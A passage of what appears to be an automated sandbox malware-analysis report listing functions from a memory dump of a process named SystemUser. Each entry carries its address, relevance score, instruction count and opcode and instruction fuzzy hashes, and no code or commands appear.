                                                            • Opcode Fuzzy Hash: ae5a284a2010dcc68d53f7ec6138762bf71df426ba2f4252f28ac0ad8c0c6c13
                                                            • Instruction Fuzzy Hash: 2B612966A4D92AAED748B77CE4415FC77A0FF843A5F488576C00DD7183CF2474868BA8
                                                            Function 00007FF848E60E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4O_^
                                                            • API String ID: 0-2486912895
                                                            • Opcode ID: d63de82a183ec1ea7c679724cf545af81a1ef2a2d3aeb082dbe9b1d1ac938e01
                                                            • Instruction ID: 4a8d98537b17108352dc82edc8aa68674f931278206cb5c0fea3bee610a7ef89
                                                            • Opcode Fuzzy Hash: d63de82a183ec1ea7c679724cf545af81a1ef2a2d3aeb082dbe9b1d1ac938e01
                                                            • Instruction Fuzzy Hash: 96515621A0EAD61FE396B73858152B93FE1EF86660B0940FBD08CC7193DD1C5C428762
                                                            Function 00007FF848E61295 Relevance: .9, Instructions: 864COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9df56b2cbe5289ad8e618154abc71d98e269f6ed9d9db94686ddda190f10cd0d
                                                            • Instruction ID: e2fe281a63d18129f252558a160a6ef84fde2ab68101ccc58e825120740cc1f5
                                                            • Opcode Fuzzy Hash: 9df56b2cbe5289ad8e618154abc71d98e269f6ed9d9db94686ddda190f10cd0d
                                                            • Instruction Fuzzy Hash: 0A21E937D0DA9A5FE306B77CA4650E93BB0FF82255F4844B7C088DA193EE2968498754
                                                            Function 00007FF848E60985 Relevance: .3, Instructions: 346COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e1464e772fc2b2c7a93a293792800d9fb918f22c27c2d34e2fd53d967fee386
                                                            • Instruction ID: 575b472e4044e73e95ba140565f8be5880f82832f897af9a596d75658db2b854
                                                            • Opcode Fuzzy Hash: 9e1464e772fc2b2c7a93a293792800d9fb918f22c27c2d34e2fd53d967fee386
                                                            • Instruction Fuzzy Hash: 39A1476AB48926AED704BB7DF4412ED7BA0FFC5375F084577C149CB183CA24648A8BE4
                                                            Function 00007FF848E609D3 Relevance: .3, Instructions: 320COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 496387fdd6cd3c58d8591a81ade4b527bb0a35661384d05cf5c2b87800e40a7e
                                                            • Instruction ID: eecb0801bc7328128886b67fff179a8d2fb5816f95aa8cf29a2dc00cca501fab
                                                            • Opcode Fuzzy Hash: 496387fdd6cd3c58d8591a81ade4b527bb0a35661384d05cf5c2b87800e40a7e
                                                            • Instruction Fuzzy Hash: E4915A6AB48926AED704BB7DF4412ED7B90FFC4375F484577C149CB183CA24648A8BE8
                                                            Function 00007FF848E60A08 Relevance: .3, Instructions: 305COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ef865662dd2be20b70809d3464c6ce454324a1195c90626cbabbe13b31f2030c
                                                            • Instruction ID: 160e872d492e83650fa9ca510aa6617220199cd54553d657639d4048b467c9fa
                                                            • Opcode Fuzzy Hash: ef865662dd2be20b70809d3464c6ce454324a1195c90626cbabbe13b31f2030c
                                                            • Instruction Fuzzy Hash: 9B814C6AB48926AED704BB7DF4412ED7BA0FFC4375F484577C149CB183CA2464868BE8
                                                            Function 00007FF848E60A10 Relevance: .3, Instructions: 301COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4c2db3743a90148bb73dd9d1a4006cc496b13b59c81a10c7e00c29443327880e
                                                            • Instruction ID: f6f4d61ea9b01d6a410ab2b1d5eeeee6aee7cb21f1c5891e2c0a2abaa257a442
                                                            • Opcode Fuzzy Hash: 4c2db3743a90148bb73dd9d1a4006cc496b13b59c81a10c7e00c29443327880e
                                                            • Instruction Fuzzy Hash: 50814C66B48926AED704BB7DF4412ED7BA0FFC4375F488577C149CB183CA2464868BE8
                                                            Function 00007FF848E60A48 Relevance: .3, Instructions: 270COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15f0cce03a3ce9a3a641be5fe894208a1e7d91e77efbb036a8e51825773fa768
                                                            • Instruction ID: 788f2d55924f7a42c27755a404fe29a961a6fac85426c8f58957decbf73e15ef
                                                            • Opcode Fuzzy Hash: 15f0cce03a3ce9a3a641be5fe894208a1e7d91e77efbb036a8e51825773fa768
                                                            • Instruction Fuzzy Hash: 4B715966B49926AED704BB7CF4412ED7BA0FFC4365F084576C109CB183CA24648ACBE8
                                                            Function 00007FF848E60638 Relevance: .1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4eba71628c72b206a8b38ded5a4aaa265f9a994d785e79bde12137cf882c08b4
                                                            • Instruction ID: 0975bc196c4843f2305e37a35939c8f41f1b070a46dd282885c5e963a13d9efc
                                                            • Opcode Fuzzy Hash: 4eba71628c72b206a8b38ded5a4aaa265f9a994d785e79bde12137cf882c08b4
                                                            • Instruction Fuzzy Hash: 8531F220B1D94D5FE798EB2C945A379B6C2EB98751F0405BAE00EC32D7DE28AC428345
                                                            Function 00007FF848E60D21 Relevance: .1, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e599d21d88484b3dbdbd38c9531d8290de95b2f2a10f37f06dddc8036165ff4f
                                                            • Instruction ID: 0176c7e368155a24fd3980d03a69ab17971ac58e51e701fec2301f93b2c58cf2
                                                            • Opcode Fuzzy Hash: e599d21d88484b3dbdbd38c9531d8290de95b2f2a10f37f06dddc8036165ff4f
                                                            • Instruction Fuzzy Hash: 79311021F1CD196FE788B7BC581A3B9B6D2FB98790F444276E00DE3293DE28A8018751
                                                            Function 00007FF848E60BD3 Relevance: .1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 256c12ec8c60fcb2cd358475d6f18771fe08b801e8006af642e8b32ce5eb8f5f
                                                            • Instruction ID: c3b8f73f7e712ed85aa0740abaa2044db78edeb513e95646978d583123dc6221
                                                            • Opcode Fuzzy Hash: 256c12ec8c60fcb2cd358475d6f18771fe08b801e8006af642e8b32ce5eb8f5f
                                                            • Instruction Fuzzy Hash: 1B41D570E1D95E5FEB88FB7898552EDBBE1FF89340F540475D009E3286CE3868058B54
                                                            Function 00007FF848E60858 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 708a77c3034297862a41cec7ec8bbee5fbe2d6a4c14baa63cb887a9a3eacb79f
                                                            • Instruction ID: 326738f93fd960065993d3a36245a95b74008931f679b57b2ff8df8b1be215e0
                                                            • Opcode Fuzzy Hash: 708a77c3034297862a41cec7ec8bbee5fbe2d6a4c14baa63cb887a9a3eacb79f
                                                            • Instruction Fuzzy Hash: 2831E96155AA496FD385FB6C98E41EA7FF1FF85204F8440F5D40AC738BDE2468018B5C
                                                            Function 00007FF848E60870 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 832ad12cdb2e6cc445ab2e151562cfd0cf496fdbc0386c8cd984eab86a8fcda8
                                                            • Instruction ID: 7563d967a7e1c5a846f13830431f29444f70cb935f6cc22c772c9d23e943552b
                                                            • Opcode Fuzzy Hash: 832ad12cdb2e6cc445ab2e151562cfd0cf496fdbc0386c8cd984eab86a8fcda8
                                                            • Instruction Fuzzy Hash: E221E621659A496FD385FF6888E41EA7FB1FF85204F8444E5D40AC738BDE3468008B5D
                                                            Function 00007FF848E622C1 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.2709400633.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_7ff848e60000_SystemUser.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 080febf42926a413e595c34fb9463c4bc52f689b8ff4a07310b417dc107ab9ca
                                                            • Instruction ID: 9984d8d1cc9eef90b27abb8d09e4801d3c1d6c1d4acab3736d9db5fe1bede21c
                                                            • Opcode Fuzzy Hash: 080febf42926a413e595c34fb9463c4bc52f689b8ff4a07310b417dc107ab9ca
                                                            • Instruction Fuzzy Hash: 7A01492490CAC10FE791B7381C550757FE0EF92280F4808BAE889D70D7D918B984835A